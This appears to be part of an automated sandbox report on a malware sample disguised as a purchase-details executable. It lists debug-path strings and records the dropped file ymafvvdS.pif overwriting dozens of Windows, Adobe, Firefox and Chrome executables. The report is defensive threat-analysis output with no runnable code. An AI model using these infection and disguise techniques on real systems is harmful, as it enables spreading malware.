                  Source: Binary string: AppVClient.pdb source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdb source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerceptionSimulationService.pdb source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: ymafvvdS.pif, 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: MsSense.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: MsSense.pdb source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D10000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.00000000024F6000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdb source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: locator.pdb source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1559563944.0000000005730000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000002.1647022839.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: easinvoker.pdbH source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2219413171.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerceptionSimulationService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: ymafvvdS.pif, 00000009.00000003.2199797397.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVClient.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdb source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdbX source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp

                  Spreading

                  barindex
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
